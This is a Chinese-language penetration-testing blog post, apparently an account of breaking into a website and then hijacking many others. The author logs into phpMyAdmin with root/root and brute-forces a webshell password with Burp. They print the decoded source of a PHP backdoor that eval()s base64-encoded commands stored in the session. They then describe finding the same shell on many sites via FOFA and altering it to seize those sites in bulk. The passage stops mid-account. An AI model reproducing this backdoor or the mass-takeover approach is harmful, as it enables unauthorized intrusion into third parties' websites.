前言
有一次渗透中遇到了一个一个网站,上面只有一个imgaes.php的shell和一个别的一句话木马还有一个phpmyadmin,于是搞下来了一大波网站,还总结了一系列的猥琐渗透手法,可能已经被隐迹于各处的大牛用了,但是还是放出来让大家玩玩吧,没技术含量,大牛勿喷
正文
这样就没辙了么,首先弱口令root/root进了phpmyadmin,可惜现在那几个拿shell的方法都挂了,并且images.php和另一个shell也没那些顺便写进去的路径和sql查询语句什么的,像这样
也没phpinfo.php之类的,也不知道路径,更懵逼了,然后用burp爆破了一波另一个shell,把密码给爆破出来了,单字一个h,然后进去先没提权,看了看images.php的源码,如下
?>
整理一下就是执行后面这个字符串base64解码之后的语句,即
@session_start();
if(isset($_POST['code'])){
(substr(sha1(md5(@$_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
@eval(base64_decode($_SESSION['theCode']));
}
这就不用我多解释了吧,a就是密码,code是语句,用菜刀还有个base64简单混淆,但是这尼玛密码MD5了又sha1的,我是密码学小白啊,咋破解,随手在fofa上搜了一搜这个shell,一大堆,于是猜测这个人根本不去一个一个提权什么的,他肯定不看,就用批量工具搞,于是,images.php的源码被我无情的改成了如下,